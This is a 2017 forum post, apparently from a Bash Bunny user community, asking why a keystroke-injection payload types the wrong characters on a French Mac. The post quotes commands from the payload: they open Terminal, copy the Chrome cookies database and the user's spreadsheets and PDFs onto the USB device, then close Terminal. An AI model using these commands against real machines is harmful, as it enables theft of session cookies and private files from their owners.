Tewfik Posted May 3, 2017 Share Posted May 3, 2017 Hello, I've updated my BB to 1.2 and i've tried to set DUCKY_LANG to fr in my config.txt file. I've tried to use the MACInfoGrabber payload. But i still have an issue because special chars arent's mapped on the same way on PC and on mac. For example when i have these commands on the payload : QUACK GUI SPACE QUACK DELAY 1000 QUACK STRING terminal QUACK ENTER QUACK DELAY 5000 QUACK STRING mkdir -p /Volumes/BashBunny/$lootdir/xlsx QUACK ENTER QUACK DELAY 500 QUACK STRING cat \~/Library/Application\\ Support/Google/Chrome/Default/Cookies \> /Volumes/BashBunny/$lootdir/chromecookies.db QUACK ENTER QUACK DELAY 1000 QUACK STRING cp \~/Documents/{*.xlsx,*.xls,*.pdf} /Volumes/BashBunny/$lootdir/xlsx/\; killall Terminal QUACK ENTER The BB in HID Mode type this text : terminalmkdir §p /Volumes/BashBunny/loot/MacLoot/xlsxcat ë/Library/Application¡ Support/Google/Chrome/Default/Cookies # /Volumes/BashBunny/loot/MacLoot/chromecookies.dbcp ë/Documents/`.xlsx ë/Documents/`.xls ë/Documents/`.pdf /Volumes/BashBunny/loot/MacLoot/xlsx/; killall Terminal I think we need 2 files per language one for Windows and one for Mac. Am I right ? I don't have any idea to fix this issue. Maybe someone have a hint for me ? Thanks by advance. Quote Link to comment Share on other sites More sharing options...
Recommended Posts
Join the conversation
You can post now and register later. If you have an account, sign in now to post with your account.